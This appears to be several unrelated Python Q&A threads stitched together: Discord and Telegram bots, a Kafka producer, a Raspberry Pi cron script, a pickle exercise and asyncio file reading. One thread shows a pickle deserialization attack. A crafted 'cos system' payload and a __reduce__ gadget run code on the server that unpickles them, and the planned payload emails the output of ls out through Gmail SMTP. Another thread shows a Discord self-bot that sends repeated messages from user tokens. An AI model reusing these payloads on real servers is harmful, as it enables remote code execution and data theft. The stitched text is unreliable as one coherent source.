Friends, I am making a Discord script in Python. I have to run this script multiple times with different parameters, and I have tried doing that with os, threading, and multiprocessing. Whichever one I try, it works only for the first row of data and then gets stuck. My code is below; please advise me.
Note: I am logging in as a user.
CSV file demo
auth-token1,channel-id1-1,channelid1-2
auth-token2,channel-id2-1,channelid2-2
...
...
main.py
import os
import csv
from time import sleep
import threading
import multiprocessing

rows = []
with open('data.csv', 'r') as csvfile:
    # creating a csv reader object
    csvreader = csv.reader(csvfile)
    # extracting each data row one by one
    for row in csvreader:
        rows.append(row)

for row in rows:
    cmd = row[0]
    for i in row[1:]:
        cmd = cmd + " " + str(i)
    print(f'python3 script.py {cmd}')
    os.system(f'python3 script.py {cmd}')
    sleep(10)
script.py
import time
import os
import sys
from time import sleep
import logging

import discord
from discord import Permissions, message

argumentList = sys.argv
print(argumentList[1:])
TOKEN_AUTH = argumentList[1]

os.environ['TZ'] = 'Asia/Kolkata'
time.tzset()

logging.basicConfig(handlers=[logging.FileHandler(filename="./discord.txt",
                                                  encoding='utf-8', mode='a+')],
                    format="%(asctime)s %(name)s:%(levelname)s:%(message)s",
                    datefmt="%F %A %T",
                    level=logging.INFO)

channel = None
client = discord.Client()
ids = argumentList[2:]
sleep_time = 121
message = "enter your message"

@client.event
async def on_ready():
    global channel
    while True:
        for _ in ids:
            try:
                channel1 = client.get_channel(int(_))
                await channel1.send(message)
                logging.info('1')
                print('sleeping')
                sleep(sleep_time * 60)
            except:
                client.run(TOKEN_AUTH, bot=False)

client.run(TOKEN_AUTH, bot=False)
It is against the Discord ToS to use bot=False, otherwise known as a self-bot (a bot running on a user account).
All I will say is that discord.py is asynchronous, and parts of your code are synchronous, which blocks it.
client.run() is also a blocking method, which is why your main.py stops after the first run. Everything you do with Discord bots needs to be async and run within the client loop.
I recommend you rethink exactly what you are trying to do and do something that does not break their Terms of Service.
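To show what "async and within the client loop" means in practice, here is a minimal hedged sketch using a proper bot token (the ids, message, and sleep_time values stand in for the variables in the OP's script.py):
import asyncio
import discord

client = discord.Client()
ids = ["1234567890"]            # placeholder channel ids
message = "enter your message"
sleep_time = 121                # minutes, as in the question

@client.event
async def on_ready():
    while True:
        for channel_id in ids:
            channel = client.get_channel(int(channel_id))
            if channel is not None:
                await channel.send(message)
            # await asyncio.sleep() instead of time.sleep(),
            # so the event loop is never blocked
            await asyncio.sleep(sleep_time * 60)

client.run("TOKEN")  # a bot token; self-bots violate the ToS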
The reason is that you are using client.run(); this method blocks all the lines after it.
If you want to send messages from anywhere in your code,
check this solution ^_^ :
client.run("TOKEN") blocking issue (python & discord.py)
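On the launcher side, os.system() likewise waits for each child process to exit, and since client.run() never returns, main.py never reaches the second row. A minimal sketch of a non-blocking launcher using subprocess.Popen (assuming the same data.csv layout as in the question):
import csv
import subprocess

with open('data.csv', 'r') as csvfile:
    rows = list(csv.reader(csvfile))

procs = []
for row in rows:
    # row[0] is the auth token, row[1:] are the channel ids
    args = ['python3', 'script.py'] + [str(col) for col in row]
    procs.append(subprocess.Popen(args))  # returns immediately

# optionally block at the very end until every child exits
for proc in procs:
    proc.wait()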
I'm working on a Mac. I get a Permission denied exception when running the code. How do I run one Python file inside the main Python file?
import os
import telebot
from telebot import types
# --------------------------\ project files /-------------------------#
from auth_data import token, txt

bot = telebot.TeleBot(token)

# first launch, start of work
@bot.message_handler(commands=['start', 'help'])
def welcome(message):
    markup = types.InlineKeyboardMarkup(row_width=1)
    parse = types.InlineKeyboardButton('📩Get messages📩', callback_data='parse')
    markup.add(parse)
    photo = open('menu.jpg', 'rb')
    bot.send_photo(message.chat.id, photo, caption=txt, reply_markup=markup, parse_mode="HTML")

# menu
@bot.callback_query_handler(func=lambda call: True)
def callback(call):
    if call.message:
        if call.data == 'parse':
            os.system('/Users/valiev/code/python/telegram_bot_parser/parser.py')

if __name__ == '__main__':
    bot.infinity_polling(none_stop=True, interval=0)
You are not running the file through Python; the shell is trying to execute the .py file directly, which fails without execute permission. Try changing
os.system('/Users/valiev/code/python/telegram_bot_parser/parser.py')
to
os.system('python3 /Users/valiev/code/python/telegram_bot_parser/parser.py')
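Alternatively, a small hedged sketch using subprocess with sys.executable, so the child script runs under the same interpreter as the bot (the path is the one from the question):
import subprocess
import sys

# run parser.py with the interpreter that is running the bot itself
subprocess.run(
    [sys.executable, '/Users/valiev/code/python/telegram_bot_parser/parser.py'],
    check=True,  # raise CalledProcessError if parser.py exits non-zero
)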
# importing the required libraries
from time import sleep
from json import dumps
from kafka import KafkaProducer

# initializing the Kafka producer
my_producer = KafkaProducer(
    bootstrap_servers=['localhost:9092'],
    value_serializer=lambda x: dumps(x).encode('utf-8')
)

# sending the numbers 0 through 9 to the 'testnum' topic
for n in range(10):
    my_data = {'num': n}
    my_producer.send('testnum', value=my_data)
    sleep(1)

# sending only the even numbers to the 'testnum1' topic
for n in range(10):
    if n % 2 == 0:
        json_data = {'num': n}
        my_producer.send('testnum1', value=json_data)
    sleep(1)
Could anyone help me set up logging for this file?
You've not printed anything, but if you want a log file, use the Python logging module, or simple shell redirection:
python producer.py > out.log
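If you go the logging-module route, a minimal hedged sketch could look like this (the producer.log file name and the format string are assumptions, not anything from the question):
import logging

# write INFO-level records to producer.log
logging.basicConfig(
    filename='producer.log',
    level=logging.INFO,
    format='%(asctime)s %(levelname)s %(message)s',
)

# e.g. log each send inside the loop
logging.info('sent %s to topic %s', {'num': 1}, 'testnum')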
I'm currently working on a script for a sensor on my Raspberry Pi. The code underneath should get the values of my sensor and write them into the data.json file. My problem is that if I run the script from the Thonny editor everything works, but if I add the script to my crontab the data does not get written to the data.json file.
The Code:
import time
import board
import adafruit_dht
import psutil
import io
import json
import os
from gpiozero import LED
from datetime import date
from datetime import datetime

# We first check if a libgpiod process is running. If yes, we kill it!
for proc in psutil.process_iter():
    if proc.name() == "libgpiod_pulsein" or proc.name() == "libgpiod_pulsei":
        proc.kill()

sensor = adafruit_dht.DHT11(board.D23)

# init
temp_values = [10]
hum_values = [10]
counter = 0
dataLED = LED(13)
dataList = []

def errSignal():
    for i in range(0, 3):
        dataLED.on()
        time.sleep(0.1)
        dataLED.off()
        time.sleep(0.1)

# on startup
def runSignal():
    for i in range(0, 5):
        dataLED.on()
        time.sleep(0.2)
        dataLED.off()
        time.sleep(0.2)

def getExistingData():
    with open('data.json') as fp:
        dataList = json.load(fp)
    print(dataList)

def startupCheck():
    if os.path.isfile("data.json") and os.access("data.json", os.R_OK):
        # checks if file exists
        print("File exists and is readable.")
        # get json data and push into arr on startup
        getExistingData()
    else:
        print("Either file is missing or is not readable, creating file...")
        # create json file
        with open("data.json", "w") as f:
            print("The json file is created.")

def calc_avgValue(values):
    sum = 0
    for iterator in values:
        sum += iterator
    return sum / len(values)

def onOFF():
    dataLED.on()
    time.sleep(0.7)
    dataLED.off()

# data led blinking on startup
runSignal()
# checks if file exists
startupCheck()

while True:
    try:
        temp_values.insert(counter, sensor.temperature)
        hum_values.insert(counter, sensor.humidity)
        counter += 1
        time.sleep(6)
        if counter >= 10:
            print(
                "Temperature: {}*C Humidity: {}% ".format(
                    round(calc_avgValue(temp_values), 2),
                    round(calc_avgValue(hum_values), 2)
                )
            )
            # get time
            today = date.today()
            now = datetime.now()
            # create json obj
            data = {
                "temperature": round(calc_avgValue(temp_values), 2),
                "humidity": round(calc_avgValue(hum_values), 2),
                "fullDate": str(today),
                "fullDate2": str(today.strftime("%d/%m/%Y")),
                "fullDate3": str(today.strftime("%B %d, %Y")),
                "fullDate4": str(today.strftime("%b-%d-%Y")),
                "date_time": str(now.strftime("%d/%m/%Y %H:%M:%S"))
            }
            # push data into list
            dataList.append(data)
            # writing to data.json
            with open("data.json", "w") as f:
                json.dump(dataList, f, indent=4, separators=(',', ': '))
            # if data is written signal appears
            onOFF()
            print("Data has been written to data.json...")
            counter = 0
    except RuntimeError as error:
        continue
    except Exception as error:
        sensor.exit()
        while True:
            errSignal()
        raise error
    time.sleep(0.2)
Crontab Menu:
[screenshot of the crontab; the line in the center is the script]
Investigation areas:
Do not put & in crontab; it serves no purpose.
You should capture the output of your scripts to see what is going on. You do this by adding >/tmp/stats.out 2>/tmp/stats.err (and similar for the other two lines). You will then see what output and errors your scripts produce.
cron does not run your scripts in the same environment, or from the same directory, that you run them from interactively. Load what you require inside the script.
cron might not have permission to write data.json in the directory it is running from. Specify a full path, and ensure cron can write in that directory, as sketched below.
Look at https://unix.stackexchange.com/questions/109804/crontabs-reboot-only-works-for-root for usage of @reboot. Things that should occur at startup should be configured through systemd or init.d (I do not know what the Raspberry Pi distro uses). cron is for scheduling jobs, not for running things at startup.
It could be as simple as python3 not being in the PATH configured for cron.
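As a hedged illustration of the full-path point, the script could anchor data.json to its own directory instead of relying on cron's working directory (a sketch; only the data.json name comes from the question):
import json
import os

# cron starts scripts from an arbitrary working directory, so
# build an absolute path from the script's own location
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DATA_FILE = os.path.join(BASE_DIR, "data.json")

dataList = []  # stands in for the sensor readings collected above

with open(DATA_FILE, "w") as f:
    json.dump(dataList, f, indent=4, separators=(',', ': '))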
I have an assignment to send a pickle file to a server which unpickles anything sent to it. My plan is to have it email me back the output of the ls command. I have this file:
import smtplib
import commands

status, output = commands.getstatusoutput("ls")
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.login("...@gmail.com", "password")
server.sendmail("...@gmail.com", "...@gmail.com", output)
server.quit()
How can I get the server to run this? I am trying to send a file like:
cos
system
(S''
tR.
with the Python script inside the ' '.
I was thinking something like:
cos
system
(S'python\n import smptlib\n ...'
tR.
but it doesn't execute the commands. How can I make it execute the Python?
I've tried it on my own computer, and the Python script sends the email fine.
Do whatever friendliness you want in the __reduce__ method. Please don't be evil.
import pickle

class Friendly:
    def __reduce__(self):
        return (self.friendly, ('executing friendly code',))

    @staticmethod
    def friendly(x):
        print(x)

pickle.dump(Friendly(), open('pickled', 'wb'))
print('loading ...')
pickle.load(open('pickled', 'rb'))
->
$ python friendly.py
loading ...
executing friendly code
I'm trying to understand how to use the new asyncio functionality in Python 3.4, and I'm struggling with how to use event_loop.add_reader(). From the limited discussions I've found, it looks like it's for reading the standard output of a separate process, as opposed to the contents of an open file. Is that true? If so, it appears there's no asyncio-specific way to integrate standard file I/O; is this also true?
I've been playing with the following code. Running it raises PermissionError: [Errno 1] Operation not permitted from line 399 of /python3.4/selectors.py (self._epoll.register(key.fd, epoll_events)), triggered by the add_reader() line below.
import asyncio
import urllib.parse
import sys
import pdb
import os

def fileCallback(*args):
    pdb.set_trace()

path = sys.argv[1]
loop = asyncio.get_event_loop()
#fd = os.open(path, os.O_RDONLY)
fd = open(path, 'r')
#data = fd.read()
#print(data)
#fd.close()
pdb.set_trace()
task = loop.add_reader(fd, fileCallback, fd)
loop.run_until_complete(task)
loop.close()
EDIT
For those looking for an example of how to use asyncio to read more than one file at a time, as I was curious about, here's how it can be accomplished. The secret is in the line yield from asyncio.sleep(0). This essentially pauses the current function, putting it back in the event loop queue, to be called after all other ready functions have executed. Functions are determined to be ready based on how they were scheduled.
import asyncio

@asyncio.coroutine
def read_section(file, length):
    yield from asyncio.sleep(0)
    return file.read(length)

@asyncio.coroutine
def read_file(path):
    fd = open(path, 'r')
    retVal = []
    cnt = 0
    while True:
        cnt = cnt + 1
        data = yield from read_section(fd, 102400)
        print(path + ': ' + str(cnt) + ' - ' + str(len(data)))
        if len(data) == 0:
            break
    fd.close()

paths = ["loadme.txt", "loadme also.txt"]
loop = asyncio.get_event_loop()
tasks = []
for path in paths:
    tasks.append(asyncio.async(read_file(path)))
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
These functions expect a file descriptor, that is, the underlying integer the operating system uses, not Python's file objects. File objects that are based on file descriptors return that descriptor from the fileno() method, so for example:
>>> sys.stderr.fileno()
2
In Unix, file descriptors can be attached to files or a lot of other things, including other processes.
Edit for the OP's edit:
As Max says in the comments, you cannot use epoll on local files (and asyncio uses epoll). Yes, that's kind of weird. You can use it on pipes, though, for example:
import asyncio
import sys

def fileCallback(*args):
    print("Received: " + sys.stdin.readline())

loop = asyncio.get_event_loop()
loop.add_reader(sys.stdin.fileno(), fileCallback)
loop.run_forever()
This will echo stuff you write on stdin.
You cannot use add_reader on local files, because:
It cannot be done using select/poll/epoll.
It depends on the operating system.
It cannot be fully asynchronous because of OS limitations (Linux does not support async filesystem metadata reads/writes).
But, technically, yes, you should be able to do asynchronous filesystem reads and writes; (almost) all systems have a DMA mechanism for doing I/O "in the background". And no, local I/O is not so fast that nobody would want it asynchronous; CPUs are on the order of millions of times faster than disk I/O.
Look for aiofile or aiofiles if you want to try async I/O; a small sketch follows.
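A minimal hedged sketch of the aiofiles route (the loadme.txt name is borrowed from the example above; aiofiles delegates the blocking calls to a thread pool behind an async interface):
import asyncio
import aiofiles  # third-party: pip install aiofiles

async def read_file(path):
    # the blocking read happens in a worker thread
    async with aiofiles.open(path, 'r') as f:
        return await f.read()

async def main():
    data = await read_file('loadme.txt')
    print(len(data))

asyncio.run(main())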